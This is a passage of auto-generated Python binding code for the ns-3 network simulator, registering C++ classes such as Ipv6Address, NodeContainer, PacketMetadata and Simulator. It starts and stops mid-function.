                   [],
                   is_const=True)
    ## ipv6-address.h (module 'network'): static bool ns3::Ipv6Address::IsMatchingType(ns3::Address const & address) [member function]
    cls.add_method('IsMatchingType',
                   'bool',
                   [param('ns3::Address const &', 'address')],
                   is_static=True)
    ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsMulticast() const [member function]
    cls.add_method('IsMulticast',
                   'bool',
                   [],
                   is_const=True)
    ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsSolicitedMulticast() const [member function]
    cls.add_method('IsSolicitedMulticast',
                   'bool',
                   [],
                   is_const=True)
    ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredAddress(ns3::Mac16Address addr, ns3::Ipv6Address prefix) [member function]
    # Three MakeAutoconfiguredAddress overloads: Mac16 / Mac48 / Mac64 source address.
    cls.add_method('MakeAutoconfiguredAddress',
                   'ns3::Ipv6Address',
                   [param('ns3::Mac16Address', 'addr'), param('ns3::Ipv6Address', 'prefix')],
                   is_static=True)
    ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredAddress(ns3::Mac48Address addr, ns3::Ipv6Address prefix) [member function]
    cls.add_method('MakeAutoconfiguredAddress',
                   'ns3::Ipv6Address',
                   [param('ns3::Mac48Address', 'addr'), param('ns3::Ipv6Address', 'prefix')],
                   is_static=True)
    ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredAddress(ns3::Mac64Address addr, ns3::Ipv6Address prefix) [member function]
    cls.add_method('MakeAutoconfiguredAddress',
                   'ns3::Ipv6Address',
                   [param('ns3::Mac64Address', 'addr'), param('ns3::Ipv6Address', 'prefix')],
                   is_static=True)
    ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredLinkLocalAddress(ns3::Mac16Address mac) [member function]
    # Three MakeAutoconfiguredLinkLocalAddress overloads: Mac16 / Mac48 / Mac64.
    cls.add_method('MakeAutoconfiguredLinkLocalAddress',
                   'ns3::Ipv6Address',
                   [param('ns3::Mac16Address', 'mac')],
                   is_static=True)
    ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredLinkLocalAddress(ns3::Mac48Address mac) [member function]
    cls.add_method('MakeAutoconfiguredLinkLocalAddress',
                   'ns3::Ipv6Address',
                   [param('ns3::Mac48Address', 'mac')],
                   is_static=True)
    ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredLinkLocalAddress(ns3::Mac64Address mac) [member function]
    cls.add_method('MakeAutoconfiguredLinkLocalAddress',
                   'ns3::Ipv6Address',
                   [param('ns3::Mac64Address', 'mac')],
                   is_static=True)
    ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeIpv4MappedAddress(ns3::Ipv4Address addr) [member function]
    cls.add_method('MakeIpv4MappedAddress',
                   'ns3::Ipv6Address',
                   [param('ns3::Ipv4Address', 'addr')],
                   is_static=True)
    ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeSolicitedAddress(ns3::Ipv6Address addr) [member function]
    cls.add_method('MakeSolicitedAddress',
                   'ns3::Ipv6Address',
                   [param('ns3::Ipv6Address', 'addr')],
                   is_static=True)
    ## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Print(std::ostream & os) const [member function]
    cls.add_method('Print',
                   'void',
                   [param('std::ostream &', 'os')],
                   is_const=True)
    ## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Serialize(uint8_t * buf) const [member function]
    cls.add_method('Serialize',
                   'void',
                   [param('uint8_t *', 'buf')],
                   is_const=True)
    ## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Set(char const * address) [member function]
    # Two Set overloads: from C string and from raw byte buffer.
    cls.add_method('Set',
                   'void',
                   [param('char const *', 'address')])
    ## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Set(uint8_t * address) [member function]
    cls.add_method('Set',
                   'void',
                   [param('uint8_t *', 'address')])
    return
def register_Ns3Ipv6InterfaceAddress_methods(root_module, cls):
    """Register Python bindings for ns3::Ipv6InterfaceAddress on *cls*.

    Each ``##`` comment quotes the C++ declaration (from
    ipv6-interface-address.h, module 'internet') bound by the call below it.
    """
    # Comparison and output-stream operators.
    cls.add_binary_comparison_operator('!=')
    cls.add_output_stream_operator()
    cls.add_binary_comparison_operator('==')
    ## ipv6-interface-address.h (module 'internet'): ns3::Ipv6InterfaceAddress::Ipv6InterfaceAddress() [constructor]
    cls.add_constructor([])
    ## ipv6-interface-address.h (module 'internet'): ns3::Ipv6InterfaceAddress::Ipv6InterfaceAddress(ns3::Ipv6Address address) [constructor]
    cls.add_constructor([param('ns3::Ipv6Address', 'address')])
    ## ipv6-interface-address.h (module 'internet'): ns3::Ipv6InterfaceAddress::Ipv6InterfaceAddress(ns3::Ipv6Address address, ns3::Ipv6Prefix prefix) [constructor]
    cls.add_constructor([param('ns3::Ipv6Address', 'address'), param('ns3::Ipv6Prefix', 'prefix')])
    ## ipv6-interface-address.h (module 'internet'): ns3::Ipv6InterfaceAddress::Ipv6InterfaceAddress(ns3::Ipv6InterfaceAddress const & o) [copy constructor]
    cls.add_constructor([param('ns3::Ipv6InterfaceAddress const &', 'o')])
    ## ipv6-interface-address.h (module 'internet'): ns3::Ipv6Address ns3::Ipv6InterfaceAddress::GetAddress() const [member function]
    cls.add_method('GetAddress',
                   'ns3::Ipv6Address',
                   [],
                   is_const=True)
    ## ipv6-interface-address.h (module 'internet'): uint32_t ns3::Ipv6InterfaceAddress::GetNsDadUid() const [member function]
    cls.add_method('GetNsDadUid',
                   'uint32_t',
                   [],
                   is_const=True)
    ## ipv6-interface-address.h (module 'internet'): ns3::Ipv6Prefix ns3::Ipv6InterfaceAddress::GetPrefix() const [member function]
    cls.add_method('GetPrefix',
                   'ns3::Ipv6Prefix',
                   [],
                   is_const=True)
    ## ipv6-interface-address.h (module 'internet'): ns3::Ipv6InterfaceAddress::Scope_e ns3::Ipv6InterfaceAddress::GetScope() const [member function]
    cls.add_method('GetScope',
                   'ns3::Ipv6InterfaceAddress::Scope_e',
                   [],
                   is_const=True)
    ## ipv6-interface-address.h (module 'internet'): ns3::Ipv6InterfaceAddress::State_e ns3::Ipv6InterfaceAddress::GetState() const [member function]
    cls.add_method('GetState',
                   'ns3::Ipv6InterfaceAddress::State_e',
                   [],
                   is_const=True)
    ## ipv6-interface-address.h (module 'internet'): void ns3::Ipv6InterfaceAddress::SetAddress(ns3::Ipv6Address address) [member function]
    cls.add_method('SetAddress',
                   'void',
                   [param('ns3::Ipv6Address', 'address')])
    ## ipv6-interface-address.h (module 'internet'): void ns3::Ipv6InterfaceAddress::SetNsDadUid(uint32_t uid) [member function]
    cls.add_method('SetNsDadUid',
                   'void',
                   [param('uint32_t', 'uid')])
    ## ipv6-interface-address.h (module 'internet'): void ns3::Ipv6InterfaceAddress::SetScope(ns3::Ipv6InterfaceAddress::Scope_e scope) [member function]
    cls.add_method('SetScope',
                   'void',
                   [param('ns3::Ipv6InterfaceAddress::Scope_e', 'scope')])
    ## ipv6-interface-address.h (module 'internet'): void ns3::Ipv6InterfaceAddress::SetState(ns3::Ipv6InterfaceAddress::State_e state) [member function]
    cls.add_method('SetState',
                   'void',
                   [param('ns3::Ipv6InterfaceAddress::State_e', 'state')])
    return
def register_Ns3Ipv6Prefix_methods(root_module, cls):
    """Register Python bindings for ns3::Ipv6Prefix on *cls*.

    Each ``##`` comment quotes the C++ declaration (from ipv6-address.h,
    module 'network') bound by the registration call below it.
    """
    # Comparison and output-stream operators.
    cls.add_binary_comparison_operator('!=')
    cls.add_output_stream_operator()
    cls.add_binary_comparison_operator('==')
    ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix() [constructor]
    cls.add_constructor([])
    ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(uint8_t * prefix) [constructor]
    cls.add_constructor([param('uint8_t *', 'prefix')])
    ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(char const * prefix) [constructor]
    cls.add_constructor([param('char const *', 'prefix')])
    ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(uint8_t prefix) [constructor]
    cls.add_constructor([param('uint8_t', 'prefix')])
    ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(ns3::Ipv6Prefix const & prefix) [copy constructor]
    cls.add_constructor([param('ns3::Ipv6Prefix const &', 'prefix')])
    ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(ns3::Ipv6Prefix const * prefix) [constructor]
    cls.add_constructor([param('ns3::Ipv6Prefix const *', 'prefix')])
    ## ipv6-address.h (module 'network'): void ns3::Ipv6Prefix::GetBytes(uint8_t * buf) const [member function]
    cls.add_method('GetBytes',
                   'void',
                   [param('uint8_t *', 'buf')],
                   is_const=True)
    ## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetLoopback() [member function]
    cls.add_method('GetLoopback',
                   'ns3::Ipv6Prefix',
                   [],
                   is_static=True)
    ## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetOnes() [member function]
    cls.add_method('GetOnes',
                   'ns3::Ipv6Prefix',
                   [],
                   is_static=True)
    ## ipv6-address.h (module 'network'): uint8_t ns3::Ipv6Prefix::GetPrefixLength() const [member function]
    cls.add_method('GetPrefixLength',
                   'uint8_t',
                   [],
                   is_const=True)
    ## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetZero() [member function]
    cls.add_method('GetZero',
                   'ns3::Ipv6Prefix',
                   [],
                   is_static=True)
    ## ipv6-address.h (module 'network'): bool ns3::Ipv6Prefix::IsEqual(ns3::Ipv6Prefix const & other) const [member function]
    cls.add_method('IsEqual',
                   'bool',
                   [param('ns3::Ipv6Prefix const &', 'other')],
                   is_const=True)
    ## ipv6-address.h (module 'network'): bool ns3::Ipv6Prefix::IsMatch(ns3::Ipv6Address a, ns3::Ipv6Address b) const [member function]
    cls.add_method('IsMatch',
                   'bool',
                   [param('ns3::Ipv6Address', 'a'), param('ns3::Ipv6Address', 'b')],
                   is_const=True)
    ## ipv6-address.h (module 'network'): void ns3::Ipv6Prefix::Print(std::ostream & os) const [member function]
    cls.add_method('Print',
                   'void',
                   [param('std::ostream &', 'os')],
                   is_const=True)
    return
def register_Ns3NodeContainer_methods(root_module, cls):
    """Register Python bindings for ns3::NodeContainer on *cls*.

    Each ``##`` comment quotes the C++ declaration (from node-container.h,
    module 'network') bound by the registration call below it.  Begin/End
    return GCC iterator types spelled out verbatim; keep those strings
    exactly as generated.
    """
    ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::NodeContainer const &', 'arg0')])
    ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer() [constructor]
    cls.add_constructor([])
    ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::Ptr<ns3::Node> node) [constructor]
    cls.add_constructor([param('ns3::Ptr< ns3::Node >', 'node')])
    ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(std::string nodeName) [constructor]
    cls.add_constructor([param('std::string', 'nodeName')])
    ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b) [constructor]
    # Convenience constructors concatenating 2..5 containers.
    cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b')])
    ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b, ns3::NodeContainer const & c) [constructor]
    cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b'), param('ns3::NodeContainer const &', 'c')])
    ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b, ns3::NodeContainer const & c, ns3::NodeContainer const & d) [constructor]
    cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b'), param('ns3::NodeContainer const &', 'c'), param('ns3::NodeContainer const &', 'd')])
    ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b, ns3::NodeContainer const & c, ns3::NodeContainer const & d, ns3::NodeContainer const & e) [constructor]
    cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b'), param('ns3::NodeContainer const &', 'c'), param('ns3::NodeContainer const &', 'd'), param('ns3::NodeContainer const &', 'e')])
    ## node-container.h (module 'network'): void ns3::NodeContainer::Add(ns3::NodeContainer other) [member function]
    # Three Add overloads: by container, by node pointer, by node name.
    cls.add_method('Add',
                   'void',
                   [param('ns3::NodeContainer', 'other')])
    ## node-container.h (module 'network'): void ns3::NodeContainer::Add(ns3::Ptr<ns3::Node> node) [member function]
    cls.add_method('Add',
                   'void',
                   [param('ns3::Ptr< ns3::Node >', 'node')])
    ## node-container.h (module 'network'): void ns3::NodeContainer::Add(std::string nodeName) [member function]
    cls.add_method('Add',
                   'void',
                   [param('std::string', 'nodeName')])
    ## node-container.h (module 'network'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Node>*,std::vector<ns3::Ptr<ns3::Node>, std::allocator<ns3::Ptr<ns3::Node> > > > ns3::NodeContainer::Begin() const [member function]
    cls.add_method('Begin',
                   '__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Node > const, std::vector< ns3::Ptr< ns3::Node > > >',
                   [],
                   is_const=True)
    ## node-container.h (module 'network'): void ns3::NodeContainer::Create(uint32_t n) [member function]
    cls.add_method('Create',
                   'void',
                   [param('uint32_t', 'n')])
    ## node-container.h (module 'network'): void ns3::NodeContainer::Create(uint32_t n, uint32_t systemId) [member function]
    cls.add_method('Create',
                   'void',
                   [param('uint32_t', 'n'), param('uint32_t', 'systemId')])
    ## node-container.h (module 'network'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Node>*,std::vector<ns3::Ptr<ns3::Node>, std::allocator<ns3::Ptr<ns3::Node> > > > ns3::NodeContainer::End() const [member function]
    cls.add_method('End',
                   '__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Node > const, std::vector< ns3::Ptr< ns3::Node > > >',
                   [],
                   is_const=True)
    ## node-container.h (module 'network'): ns3::Ptr<ns3::Node> ns3::NodeContainer::Get(uint32_t i) const [member function]
    cls.add_method('Get',
                   'ns3::Ptr< ns3::Node >',
                   [param('uint32_t', 'i')],
                   is_const=True)
    ## node-container.h (module 'network'): static ns3::NodeContainer ns3::NodeContainer::GetGlobal() [member function]
    cls.add_method('GetGlobal',
                   'ns3::NodeContainer',
                   [],
                   is_static=True)
    ## node-container.h (module 'network'): uint32_t ns3::NodeContainer::GetN() const [member function]
    cls.add_method('GetN',
                   'uint32_t',
                   [],
                   is_const=True)
    return
def register_Ns3ObjectBase_methods(root_module, cls):
    """Register Python bindings for ns3::ObjectBase on *cls*.

    Each ``##`` comment quotes the C++ declaration (from object-base.h,
    module 'core') bound by the registration call below it.  Two protected
    members (ConstructSelf, NotifyConstructionCompleted) are registered
    with visibility='protected'.
    """
    ## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase() [constructor]
    cls.add_constructor([])
    ## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase(ns3::ObjectBase const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::ObjectBase const &', 'arg0')])
    ## object-base.h (module 'core'): void ns3::ObjectBase::GetAttribute(std::string name, ns3::AttributeValue & value) const [member function]
    cls.add_method('GetAttribute',
                   'void',
                   [param('std::string', 'name'), param('ns3::AttributeValue &', 'value')],
                   is_const=True)
    ## object-base.h (module 'core'): bool ns3::ObjectBase::GetAttributeFailSafe(std::string name, ns3::AttributeValue & attribute) const [member function]
    cls.add_method('GetAttributeFailSafe',
                   'bool',
                   [param('std::string', 'name'), param('ns3::AttributeValue &', 'attribute')],
                   is_const=True)
    ## object-base.h (module 'core'): ns3::TypeId ns3::ObjectBase::GetInstanceTypeId() const [member function]
    cls.add_method('GetInstanceTypeId',
                   'ns3::TypeId',
                   [],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## object-base.h (module 'core'): static ns3::TypeId ns3::ObjectBase::GetTypeId() [member function]
    cls.add_method('GetTypeId',
                   'ns3::TypeId',
                   [],
                   is_static=True)
    ## object-base.h (module 'core'): void ns3::ObjectBase::SetAttribute(std::string name, ns3::AttributeValue const & value) [member function]
    cls.add_method('SetAttribute',
                   'void',
                   [param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
    ## object-base.h (module 'core'): bool ns3::ObjectBase::SetAttributeFailSafe(std::string name, ns3::AttributeValue const & value) [member function]
    cls.add_method('SetAttributeFailSafe',
                   'bool',
                   [param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
    ## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
    cls.add_method('TraceConnect',
                   'bool',
                   [param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
    ## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
    cls.add_method('TraceConnectWithoutContext',
                   'bool',
                   [param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
    ## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
    cls.add_method('TraceDisconnect',
                   'bool',
                   [param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
    ## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
    cls.add_method('TraceDisconnectWithoutContext',
                   'bool',
                   [param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
    ## object-base.h (module 'core'): void ns3::ObjectBase::ConstructSelf(ns3::AttributeConstructionList const & attributes) [member function]
    cls.add_method('ConstructSelf',
                   'void',
                   [param('ns3::AttributeConstructionList const &', 'attributes')],
                   visibility='protected')
    ## object-base.h (module 'core'): void ns3::ObjectBase::NotifyConstructionCompleted() [member function]
    cls.add_method('NotifyConstructionCompleted',
                   'void',
                   [],
                   visibility='protected', is_virtual=True)
    return
def register_Ns3ObjectDeleter_methods(root_module, cls):
    """Bind ns3::ObjectDeleter (object.h, module 'core') on *cls*: the
    default and copy constructors plus the static Delete member function."""
    # Default constructor, then the copy constructor.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::ObjectDeleter const &', 'arg0')])
    # static void ns3::ObjectDeleter::Delete(ns3::Object * object)
    cls.add_method('Delete', 'void', [param('ns3::Object *', 'object')], is_static=True)
    return
def register_Ns3ObjectFactory_methods(root_module, cls):
    """Bind ns3::ObjectFactory (object-factory.h, module 'core') on *cls*."""
    cls.add_output_stream_operator()
    # Copy constructor, default constructor, construct-from-type-name.
    cls.add_constructor([param('ns3::ObjectFactory const &', 'arg0')])
    cls.add_constructor([])
    cls.add_constructor([param('std::string', 'typeId')])
    # ns3::Ptr<ns3::Object> Create() const
    cls.add_method('Create', 'ns3::Ptr< ns3::Object >', [], is_const=True)
    # ns3::TypeId GetTypeId() const
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_const=True)
    # void Set(std::string name, ns3::AttributeValue const & value)
    cls.add_method('Set', 'void',
                   [param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
    # void SetTypeId(...) overloads, registered in declaration order:
    # by ns3::TypeId, by C string, and by std::string.
    for tid_type in ('ns3::TypeId', 'char const *', 'std::string'):
        cls.add_method('SetTypeId', 'void', [param(tid_type, 'tid')])
    return
def register_Ns3PacketMetadata_methods(root_module, cls):
    """Register Python bindings for ns3::PacketMetadata on *cls*.

    Each ``##`` comment quotes the C++ declaration (from packet-metadata.h,
    module 'network') bound by the registration call below it.
    """
    ## packet-metadata.h (module 'network'): ns3::PacketMetadata::PacketMetadata(uint64_t uid, uint32_t size) [constructor]
    cls.add_constructor([param('uint64_t', 'uid'), param('uint32_t', 'size')])
    ## packet-metadata.h (module 'network'): ns3::PacketMetadata::PacketMetadata(ns3::PacketMetadata const & o) [copy constructor]
    cls.add_constructor([param('ns3::PacketMetadata const &', 'o')])
    ## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddAtEnd(ns3::PacketMetadata const & o) [member function]
    cls.add_method('AddAtEnd',
                   'void',
                   [param('ns3::PacketMetadata const &', 'o')])
    ## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddHeader(ns3::Header const & header, uint32_t size) [member function]
    cls.add_method('AddHeader',
                   'void',
                   [param('ns3::Header const &', 'header'), param('uint32_t', 'size')])
    ## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddPaddingAtEnd(uint32_t end) [member function]
    cls.add_method('AddPaddingAtEnd',
                   'void',
                   [param('uint32_t', 'end')])
    ## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddTrailer(ns3::Trailer const & trailer, uint32_t size) [member function]
    cls.add_method('AddTrailer',
                   'void',
                   [param('ns3::Trailer const &', 'trailer'), param('uint32_t', 'size')])
    ## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator ns3::PacketMetadata::BeginItem(ns3::Buffer buffer) const [member function]
    cls.add_method('BeginItem',
                   'ns3::PacketMetadata::ItemIterator',
                   [param('ns3::Buffer', 'buffer')],
                   is_const=True)
    ## packet-metadata.h (module 'network'): ns3::PacketMetadata ns3::PacketMetadata::CreateFragment(uint32_t start, uint32_t end) const [member function]
    cls.add_method('CreateFragment',
                   'ns3::PacketMetadata',
                   [param('uint32_t', 'start'), param('uint32_t', 'end')],
                   is_const=True)
    ## packet-metadata.h (module 'network'): uint32_t ns3::PacketMetadata::Deserialize(uint8_t const * buffer, uint32_t size) [member function]
    cls.add_method('Deserialize',
                   'uint32_t',
                   [param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
    ## packet-metadata.h (module 'network'): static void ns3::PacketMetadata::Enable() [member function]
    cls.add_method('Enable',
                   'void',
                   [],
                   is_static=True)
    ## packet-metadata.h (module 'network'): static void ns3::PacketMetadata::EnableChecking() [member function]
    cls.add_method('EnableChecking',
                   'void',
                   [],
                   is_static=True)
    ## packet-metadata.h (module 'network'): uint32_t ns3::PacketMetadata::GetSerializedSize() const [member function]
    cls.add_method('GetSerializedSize',
                   'uint32_t',
                   [],
                   is_const=True)
    ## packet-metadata.h (module 'network'): uint64_t ns3::PacketMetadata::GetUid() const [member function]
    cls.add_method('GetUid',
                   'uint64_t',
                   [],
                   is_const=True)
    ## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveAtEnd(uint32_t end) [member function]
    cls.add_method('RemoveAtEnd',
                   'void',
                   [param('uint32_t', 'end')])
    ## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveAtStart(uint32_t start) [member function]
    cls.add_method('RemoveAtStart',
                   'void',
                   [param('uint32_t', 'start')])
    ## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveHeader(ns3::Header const & header, uint32_t size) [member function]
    cls.add_method('RemoveHeader',
                   'void',
                   [param('ns3::Header const &', 'header'), param('uint32_t', 'size')])
    ## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveTrailer(ns3::Trailer const & trailer, uint32_t size) [member function]
    cls.add_method('RemoveTrailer',
                   'void',
                   [param('ns3::Trailer const &', 'trailer'), param('uint32_t', 'size')])
    ## packet-metadata.h (module 'network'): uint32_t ns3::PacketMetadata::Serialize(uint8_t * buffer, uint32_t maxSize) const [member function]
    cls.add_method('Serialize',
                   'uint32_t',
                   [param('uint8_t *', 'buffer'), param('uint32_t', 'maxSize')],
                   is_const=True)
    return
def register_Ns3PacketMetadataItem_methods(root_module, cls):
    """Bind ns3::PacketMetadata::Item (packet-metadata.h, module 'network')
    on *cls*: constructors plus its public data members."""
    # Default and copy constructors.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::PacketMetadata::Item const &', 'arg0')])
    # Public data members, all exposed as mutable instance attributes,
    # registered in declaration order.
    for member, cpp_type in (('current', 'ns3::Buffer::Iterator'),
                             ('currentSize', 'uint32_t'),
                             ('currentTrimedFromEnd', 'uint32_t'),
                             ('currentTrimedFromStart', 'uint32_t'),
                             ('isFragment', 'bool'),
                             ('tid', 'ns3::TypeId')):
        cls.add_instance_attribute(member, cpp_type, is_const=False)
    return
def register_Ns3PacketMetadataItemIterator_methods(root_module, cls):
    """Bind ns3::PacketMetadata::ItemIterator (packet-metadata.h, module
    'network') on *cls*."""
    # Copy constructor, then ItemIterator(PacketMetadata const *, Buffer).
    cls.add_constructor([param('ns3::PacketMetadata::ItemIterator const &', 'arg0')])
    cls.add_constructor([param('ns3::PacketMetadata const *', 'metadata'),
                         param('ns3::Buffer', 'buffer')])
    # bool HasNext() const
    cls.add_method('HasNext', 'bool', [], is_const=True)
    # ns3::PacketMetadata::Item Next()
    cls.add_method('Next', 'ns3::PacketMetadata::Item', [])
    return
def register_Ns3PacketTagIterator_methods(root_module, cls):
    """Bind ns3::PacketTagIterator (packet.h, module 'network') on *cls*."""
    # Copy constructor.
    cls.add_constructor([param('ns3::PacketTagIterator const &', 'arg0')])
    # bool HasNext() const
    cls.add_method('HasNext', 'bool', [], is_const=True)
    # ns3::PacketTagIterator::Item Next()
    cls.add_method('Next', 'ns3::PacketTagIterator::Item', [])
    return
def register_Ns3PacketTagIteratorItem_methods(root_module, cls):
    """Bind ns3::PacketTagIterator::Item (packet.h, module 'network') on *cls*."""
    # Copy constructor.
    cls.add_constructor([param('ns3::PacketTagIterator::Item const &', 'arg0')])
    # void GetTag(ns3::Tag & tag) const
    cls.add_method('GetTag', 'void', [param('ns3::Tag &', 'tag')], is_const=True)
    # ns3::TypeId GetTypeId() const
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_const=True)
    return
def register_Ns3PacketTagList_methods(root_module, cls):
    """Register ns3::PacketTagList constructors and methods (packet-tag-list.h, module 'network')."""
    # Default and copy constructors.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::PacketTagList const &', 'o')])
    # void Add(ns3::Tag const & tag) const
    cls.add_method('Add', 'void', [param('ns3::Tag const &', 'tag')], is_const=True)
    # ns3::PacketTagList::TagData const * Head() const
    cls.add_method('Head', 'ns3::PacketTagList::TagData const *', [], is_const=True)
    # bool Peek(ns3::Tag & tag) const
    cls.add_method('Peek', 'bool', [param('ns3::Tag &', 'tag')], is_const=True)
    # bool Remove(ns3::Tag & tag)
    cls.add_method('Remove', 'bool', [param('ns3::Tag &', 'tag')])
    # void RemoveAll()
    cls.add_method('RemoveAll', 'void', [])
    # bool Replace(ns3::Tag & tag)
    cls.add_method('Replace', 'bool', [param('ns3::Tag &', 'tag')])
    return
def register_Ns3PacketTagListTagData_methods(root_module, cls):
    """Register ns3::PacketTagList::TagData constructors and data members (packet-tag-list.h, module 'network')."""
    # Default and copy constructors.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::PacketTagList::TagData const &', 'arg0')])
    # Public data members exposed as mutable instance attributes.
    cls.add_instance_attribute('count', 'uint32_t', is_const=False)
    cls.add_instance_attribute('data', 'uint8_t [ 20 ]', is_const=False)
    cls.add_instance_attribute('next', 'ns3::PacketTagList::TagData *', is_const=False)
    cls.add_instance_attribute('tid', 'ns3::TypeId', is_const=False)
    return
def register_Ns3SimpleRefCount__Ns3Object_Ns3ObjectBase_Ns3ObjectDeleter_methods(root_module, cls):
    """Register the SimpleRefCount<Object, ObjectBase, ObjectDeleter> template instance (simple-ref-count.h, module 'core')."""
    # Default and copy constructors.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter > const &', 'o')])
    # static void Cleanup()
    cls.add_method('Cleanup', 'void', [], is_static=True)
    return
def register_Ns3Simulator_methods(root_module, cls):
    """Register ns3::Simulator (simulator.h, module 'core'); its entire API is static."""
    # Copy constructor.
    cls.add_constructor([param('ns3::Simulator const &', 'arg0')])
    # static void Cancel(ns3::EventId const & id)
    cls.add_method('Cancel', 'void', [param('ns3::EventId const &', 'id')], is_static=True)
    # static void Destroy()
    cls.add_method('Destroy', 'void', [], is_static=True)
    # static uint32_t GetContext()
    cls.add_method('GetContext', 'uint32_t', [], is_static=True)
    # static ns3::Time GetDelayLeft(ns3::EventId const & id)
    cls.add_method('GetDelayLeft', 'ns3::Time', [param('ns3::EventId const &', 'id')], is_static=True)
    # static ns3::Ptr<ns3::SimulatorImpl> GetImplementation()
    cls.add_method('GetImplementation', 'ns3::Ptr< ns3::SimulatorImpl >', [], is_static=True)
    # static ns3::Time GetMaximumSimulationTime()
    cls.add_method('GetMaximumSimulationTime', 'ns3::Time', [], is_static=True)
    # static uint32_t GetSystemId()
    cls.add_method('GetSystemId', 'uint32_t', [], is_static=True)
    # static bool IsExpired(ns3::EventId const & id)
    cls.add_method('IsExpired', 'bool', [param('ns3::EventId const &', 'id')], is_static=True)
    # static bool IsFinished()
    cls.add_method('IsFinished', 'bool', [], is_static=True)
    # static ns3::Time Now()
    cls.add_method('Now', 'ns3::Time', [], is_static=True)
    # static void Remove(ns3::EventId const & id)
    cls.add_method('Remove', 'void', [param('ns3::EventId const &', 'id')], is_static=True)
    # static void SetImplementation(ns3::Ptr<ns3::SimulatorImpl> impl)
